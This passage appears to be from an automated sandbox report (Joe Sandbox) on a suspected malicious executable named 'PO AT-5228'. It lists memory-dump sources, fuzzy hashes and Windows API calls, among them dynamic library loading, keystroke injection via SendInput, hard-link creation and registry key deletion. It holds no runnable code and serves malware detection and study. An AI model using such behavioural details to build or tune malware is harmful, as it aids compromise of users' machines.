                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1071820185
                                                                                        • Opcode ID: 05eecd73a51fed28ca4973872898d40c8ed95db067c0e5efa345e4d6b8bc20f1
                                                                                        • Instruction ID: 4a95168cfd2f8f6977cf4bc926dabc2dbd51a0722830bed6e55bcf143d5efb4e
                                                                                        • Opcode Fuzzy Hash: 05eecd73a51fed28ca4973872898d40c8ed95db067c0e5efa345e4d6b8bc20f1
                                                                                        • Instruction Fuzzy Hash: 56D0C7749647229FDB209F65E888741B6E4EB16711F14C46DE456E3150DAB0C8C19B51
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00BA052F,?,00BA06D7), ref: 00BA0572
                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00BA0584
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1587604923
                                                                                        • Opcode ID: b7227a4cd7ca7dd934cd88a0775f7ca626614d2bd37604d6798142df77004bf9
                                                                                        • Instruction ID: 5a0af59e406b0ce875a04f0554938e99d57c3cacf00b517a88bdb1cb947c5f24
                                                                                        • Opcode Fuzzy Hash: b7227a4cd7ca7dd934cd88a0775f7ca626614d2bd37604d6798142df77004bf9
                                                                                        • Instruction Fuzzy Hash: C0D0A7349183229FC7206FB0E888B4277E4EB16300F10846DE881E3150DBB0C4C49F20
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00BBECBE,?,00BBEBBB), ref: 00BBECD6
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BBECE8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                        • API String ID: 2574300362-1816364905
                                                                                        • Opcode ID: f5f59698099b171ea82398e34a9b3e02b5892235d88b10bdd6e64bf8a73ce5cb
                                                                                        • Instruction ID: f95ab98a8b8d33ba0170aff164c50bbc3cb6cf8a28fc2b564dbf544e822e04f3
                                                                                        • Opcode Fuzzy Hash: f5f59698099b171ea82398e34a9b3e02b5892235d88b10bdd6e64bf8a73ce5cb
                                                                                        • Instruction Fuzzy Hash: D0D0A7345007239FCB205F60E8887D27AE4EF05301B00846DF855E7160DFF0C8C49750
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00BBBAD3,00000001,00BBB6EE,?,00BFDC00), ref: 00BBBAEB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BBBAFD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: 575a9f451959cffbb35d4bba3e60ecd10450a14b99a6b34ac16bd826cfbec13f
                                                                                        • Instruction ID: 16ba20facf355603fc8a4dfa1a199ff6dd4364db1d8bd09177b6e6ede0cbd586
                                                                                        • Opcode Fuzzy Hash: 575a9f451959cffbb35d4bba3e60ecd10450a14b99a6b34ac16bd826cfbec13f
                                                                                        • Instruction Fuzzy Hash: 36D092789007129FDB349F65A888BA276E8EB05751B10846EA897A2254EBF0D880CA51
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00BC3BD1,?,00BC3E06), ref: 00BC3BE9
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BC3BFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: d531d93e78874d3982d83edddb06e9086317ee9c4a989ef24df03d9dc39e0433
                                                                                        • Instruction ID: d1f9d2170ad23a32f310759bf5600fb6f00cc393601746650fcb03d301a1e405
                                                                                        • Opcode Fuzzy Hash: d531d93e78874d3982d83edddb06e9086317ee9c4a989ef24df03d9dc39e0433
                                                                                        • Instruction Fuzzy Hash: 4DD0A7705007529FC7205F60E848B47BAF4EB02718B10846DF445F3250DAF4C4C08F10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3487a5c5d26573959ebe7c17e130244cf0f3381e6d290567af407bdc0e495750
                                                                                        • Instruction ID: 4228bc4110ae1db83ed8b4397404c0741d07fa34717fb569e1bc9114c556cb51
                                                                                        • Opcode Fuzzy Hash: 3487a5c5d26573959ebe7c17e130244cf0f3381e6d290567af407bdc0e495750
                                                                                        • Instruction Fuzzy Hash: 03C12B75A0021AEFDF54DF98C884AAEB7F5FF48700F1085ACE905AB251D7319E81DB90
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BBAAB4
                                                                                        • CoUninitialize.OLE32 ref: 00BBAABF
                                                                                          • Part of subcall function 00BA0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA027B
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BBAACA
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BBAD9D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        • Opcode ID: 54923b5ebf5e46bbe327bb0d14bce105b76acf9da20930c562a5b9443e6edc65
                                                                                        • Instruction ID: e1694680ef93b043cf988cf8bc5aac367bad8908d8f3e6d29db96f94bd694a76
                                                                                        • Opcode Fuzzy Hash: 54923b5ebf5e46bbe327bb0d14bce105b76acf9da20930c562a5b9443e6edc65
                                                                                        • Instruction Fuzzy Hash: E8A14B356047019FDB10DF18C891B6AB7E5FF88710F148499F99A9B3A2CB74ED44CB86
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: dcd2736a5abd28649f6e8d68555cf1ec69bab5ec69b0f9b1b742196a08b9ef2d
                                                                                        • Instruction ID: 282bdbed43d2e948570a7a117c072a6702be15224bd68692a795961ab12be974
                                                                                        • Opcode Fuzzy Hash: dcd2736a5abd28649f6e8d68555cf1ec69bab5ec69b0f9b1b742196a08b9ef2d
                                                                                        • Instruction Fuzzy Hash: 43518230608306ABDFA49F6DD4D1A2EB7E5EF55310B24C8BFE55ACB2D1DB7498808709
                                                                                        APIs
                                                                                          • Part of subcall function 00B64517: _fseek.LIBCMT ref: 00B6452F
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC65D
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC670
                                                                                        • _free.LIBCMT ref: 00BAC4DD
                                                                                        • _free.LIBCMT ref: 00BAC4E4
                                                                                        • _free.LIBCMT ref: 00BAC54F
                                                                                          • Part of subcall function 00B81C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00B87A85), ref: 00B81CB1
                                                                                          • Part of subcall function 00B81C9D: GetLastError.KERNEL32(00000000,?,00B87A85), ref: 00B81CC3
                                                                                        • _free.LIBCMT ref: 00BAC557
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                        • Instruction ID: 56f34d0ced4a4fe6086e913f59f60c9aa3312c1205c603ff0b394a6916a766d1
                                                                                        • Opcode Fuzzy Hash: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                        • Instruction Fuzzy Hash: 01514CB1904218AFDB149F68DC81AAEBBB9EF49300F1004EEF259A7251DB755A80CF59
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(01949590,?), ref: 00BCC544
                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00BCC574
                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00BCC5DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        • Opcode ID: 76b7660b78fb9e348dd8e08998d261a975541c5b02ddf71e1806bda1a7e37af4
                                                                                        • Instruction ID: 3c36224b3ba83f36220f82c36ec0cb812711a5a3611506db5d799eb7a7b9ecfc
                                                                                        • Opcode Fuzzy Hash: 76b7660b78fb9e348dd8e08998d261a975541c5b02ddf71e1806bda1a7e37af4
                                                                                        • Instruction Fuzzy Hash: 43512E75900104EFCF20DF68C881EAE7BF5EB65320F1486A9F9599B291D770ED41CB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B9C462
                                                                                        • __itow.LIBCMT ref: 00B9C49C
                                                                                          • Part of subcall function 00B9C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B9C753
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B9C505
                                                                                        • __itow.LIBCMT ref: 00B9C55A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: 43aca624aa85876a80c1d07ed4069fecc4f125cf04024073a182177b8d982091
                                                                                        • Instruction ID: f2bf938506971eca60a9e2b079627eb184678a3a5d9b98badc1de3d6ad979781
                                                                                        • Opcode Fuzzy Hash: 43aca624aa85876a80c1d07ed4069fecc4f125cf04024073a182177b8d982091
                                                                                        • Instruction Fuzzy Hash: 77418271A00208AFDF25EF54C852BEE7FF9EF59700F0040A9FA05A7291DB749A55CBA1
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BA3966
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BA3982
                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00BA39EF
                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00BA3A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: aedcaa05c0046a74ded6ace9553f9c4e468f3b3ef0d8066dff685b7b0ed109ba
                                                                                        • Instruction ID: b5925a92d80564ad86f597f0df824495edf2677a5b15164cd8aa8edd91472b2c
                                                                                        • Opcode Fuzzy Hash: aedcaa05c0046a74ded6ace9553f9c4e468f3b3ef0d8066dff685b7b0ed109ba
                                                                                        • Instruction Fuzzy Hash: E5412970A0C258AEEF248B64C8467FEBBF5DB57710F04019AF4C2561C1C7B58E85D761
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BAE742
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00BAE768
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BAE78D
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BAE7B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        • Opcode ID: 43a132df807db5ede35005f0e4b7cb91ef823ea5c4c5821edc0fd9456595605c
                                                                                        • Instruction ID: 406b60870b66fb1da642395deaacda6e52ac95d8a36ff0f15886f3d7c6ed356c
                                                                                        • Opcode Fuzzy Hash: 43a132df807db5ede35005f0e4b7cb91ef823ea5c4c5821edc0fd9456595605c
                                                                                        • Instruction Fuzzy Hash: C74104396006109FCF11AF15C484A4DBBE5FF9A710B0984D8E95AAB3A2CB78FD008B95
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BCB5D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: a8fbf2f08631a4c93c10e129f2ba72bb32dd280b5e0f0f88bd9b3efab5e44268
                                                                                        • Instruction ID: a83a5eded9006dd265b48b9b4363f8ea45a4c290ffa7a4c7a8b8327bb7497e2f
                                                                                        • Opcode Fuzzy Hash: a8fbf2f08631a4c93c10e129f2ba72bb32dd280b5e0f0f88bd9b3efab5e44268
                                                                                        • Instruction Fuzzy Hash: B831DC74601208EFEF208F18CC9AFACB7E5EB25310F6441A9FA51D72E1CB30A9408B51
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCD807
                                                                                        • GetWindowRect.USER32(?,?), ref: 00BCD87D
                                                                                        • PtInRect.USER32(?,?,00BCED5A), ref: 00BCD88D
                                                                                        • MessageBeep.USER32(00000000), ref: 00BCD8FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 366ce60c0af63c1d8ce28c6d08d7c38e69dbdb740fe973dcd76da39f0e306457
                                                                                        • Instruction ID: 49902431f7d6e263711c2306deb48bc46b06835a8270cbd19632c49bf34fe09c
                                                                                        • Opcode Fuzzy Hash: 366ce60c0af63c1d8ce28c6d08d7c38e69dbdb740fe973dcd76da39f0e306457
                                                                                        • Instruction Fuzzy Hash: 63415378A00219DFCB21DF58D884FADBBF5FB88310F1881F9E8559B2A4D730A946CB50
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00BA3AB8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BA3AD4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00BA3B34
                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00BA3B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 699c6426c6d7c5fc68c82968f65bf2523307f22615aa301eb17f94d9e4b10e4b
                                                                                        • Instruction ID: 5bcd56a68de0ef249a4a8271cf53d0871216afe04b24ef8a4775c908d8329176
                                                                                        • Opcode Fuzzy Hash: 699c6426c6d7c5fc68c82968f65bf2523307f22615aa301eb17f94d9e4b10e4b
                                                                                        • Instruction Fuzzy Hash: 40315530A08258AEEF248B68C859BFE7BE6DB57710F84019AF481972D1C7748F85D771
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B94038
                                                                                        • __isleadbyte_l.LIBCMT ref: 00B94066
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B94094
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B940CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
